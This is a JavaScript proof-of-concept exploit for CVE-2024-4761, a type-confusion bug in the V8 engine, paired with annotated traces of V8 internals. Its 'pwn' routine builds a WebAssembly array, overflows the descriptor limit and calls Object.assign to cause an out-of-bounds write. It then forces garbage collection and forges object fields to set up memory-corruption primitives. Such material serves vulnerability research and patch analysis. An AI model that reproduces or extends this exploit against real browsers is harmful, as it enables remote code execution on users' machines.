// Build d8 using:// a) Run once//    git checkout 6f98fbe86a0d11e6c902e2ee50f609db046daf71//    gclient sync//    gn gen ./out/x64.debug//    gn gen ./out/x64.release//// b) //    Debug Build://    ninja -C ./out/x64.debug d8////    Release Build://    ninja -C ./out/x64.release d8//

function gc_minor() { //scavenge    for(let i = 0; i < 1000; i++) {        new ArrayBuffer(0x10000);    }}

function gc_major() { //mark-sweep    new ArrayBuffer(0x7FE00000);}

d8.file.execute("wasm-module-builder.js");

let builder = new WasmModuleBuilder();

let array_type = builder.addArray(kWasmI32, true);builder.addFunction('create_array', makeSig([kWasmI32], [wasmRefType(array_type)]))    .addBody([        kExprLocalGet, 0,        kGCPrefix, kExprArrayNewDefault, array_type,    ]).exportFunc();

let wasm_instance = builder.instantiate({});let wasm = wasm_instance.exports;

const kDescriptorIndexBitCount = 10;const kMaxNumberOfDescriptors = (1 << kDescriptorIndexBitCount) - 4; //1020

//TF_BUILTIN(ObjectAssign, ObjectBuiltinsAssembler)//    args.ForEach(//        [=](TNode<Object> next_source) {//          CallBuiltin(Builtin::kSetDataProperties, context, to, next_source);//        },//        IntPtrConstant(1));//TF_BUILTIN(SetDataProperties, SetOrCopyDataPropertiesAssembler)//  TailCallRuntime(Runtime::kSetDataProperties, context, target, source);//RUNTIME_FUNCTION(Runtime_SetDataProperties)//  JSReceiver::SetOrCopyDataProperties(...)function install_primitives() {    let src = {};    for(let i = 0; i < (kMaxNumberOfDescriptors+1); i++) {        src[`p${i}`] = 1;    }    //stops us from crashing in SetOrCopyDataProperties    src.__defineGetter__("p0", function() {        throw new Error("bailout");    });    //need to create the map beforehand to avoid descriptor arrays being allocated     //innapropriately    let dummy = {};    dummy.i1 = 0;    dummy.i2 = 0;    dummy.i3 = 0;    dummy.i4 = 0;    for(let i = 1; i <= 16; i++) {        dummy[`p${i}`] = 0;    }

    var o = {};    //inline properties    o.i1 = 0;    o.i2 = 0;    o.i3 = 0;    o.i4 = 0;

    //external properties    o.p1 = 0; //fake SeqTwoByteString length field    for(let i = 2; i <= 15; i++) {        o[`p${i}`] = 0;    }    let wasm_array = wasm.create_array(0);    o.p16 = 0; //reallocates new property array twice as large        var arr1 = [1.1];//, 1.1, 1.1, 1.1];    var arr2 = [{}];

    %DebugPrint(wasm_array);    %DebugPrint(o);

    try {        //trigger 1 element OOB zero write        Object.assign(wasm_array, src);    } catch(err) {}        gc_major();    %DebugPrint(wasm_array);    o.p9 = 1024;    o.p11 = 1024;    //%DebugPrint(o); //will crash        %DebugPrint(arr1);}function pwn() {    install_primitives();}

pwn();

JSReceiver::SetOrCopyDataProperties  JSObject::NormalizeProperties(target, CLEAR_INOBJECT_PROPERTIES)  Runtime::SetObjectProperty(target, key, value)

JSObject::NormalizeProperties  new_map = Map::Normalize(map)  JSObject::MigrateToMap(target, new_map, expected_additional_properties)

Map::Normalize  Map::CopyNormalized()    new_instance_size = map->instance_size()    if (mode == CLEAR_INOBJECT_PROPERTIES) {      new_instance_size -= map->GetInObjectProperties() * kTaggedSize;    }    result = RawCopy(map, new_instance_size, 0)      Factory::NewMap(), Factory::NewMapImpl()        Factory::InitializeMap()          if (InstanceTypeChecker::IsJSObject(type)) {            ...          } else {            map->set_inobject_properties_start_or_constructor_function_index(0) <------- (1)          }

JSObject::MigrateToMap  MigrateFastToSlow()    <create dictionary...>    object->SetProperties(*dictionary)

    // clear up in-object properties    inobject_properties = new_map->GetInObjectProperties()    for (int i = 0; i < inobject_properties; i++) {      object->FastPropertyAtPut(FieldIndex::ForPropertyIndex(*new_map, i), Smi::zero()); <------- (2)    }

FieldIndex::ForPropertyIndex  bool is_inobject = property_index < map->GetInObjectProperties()  if (is_inobject) offset = map->GetInObjectPropertyOffset(property_index) <------- (3)  return FieldIndex(...)

Map::instance_size()  return 0

Map::GetInObjectProperties()    return instance_size_in_words() - GetInObjectPropertiesStartInWords();

Map:GetInObjectPropertiesStartInWords()  return inobject_properties_start_or_constructor_function_index()

Map::GetInObjectPropertyOffset(int index)  return (GetInObjectPropertiesStartInWords() + index) * kTaggedSize;

Tagged<FixedArrayBase> Heap::LeftTrimFixedArray(Tagged<FixedArrayBase> object,                                                int elements_to_trim) {  ...

  const int element_size = IsFixedArray(object) ? kTaggedSize : kDoubleSize;     const int bytes_to_trim = elements_to_trim * element_size;   <------ IsFixedArray(object) return false, bytes_to_trim = 8

  const int len = object->length();            <--------- len is 0  DCHECK(elements_to_trim <= len);    Address old_start = object.address();  Address new_start = old_start + bytes_to_trim;

  CreateFillerObjectAtRaw();   <--- create 8 bytes filler at old_start

  ...

  RELAXED_WRITE_FIELD(object, bytes_to_trim,                      Tagged<Object>(MapWord::FromMap(map).ptr()));  RELAXED_WRITE_FIELD(object, bytes_to_trim + kTaggedSize,                      Smi::FromInt(len - elements_to_trim));     <---------- overflow???

}

CVE-2024-4761: v8 missing check of WasmObject type cast causes type confusion and OOB accesshttps://buptsb.github.io/blog/post/CVE-2024-4761-%20v8%20missing%20check%20of%20WasmObject%20type%20cast%20causes%20type%20confusion%20and%20OOB%20access.html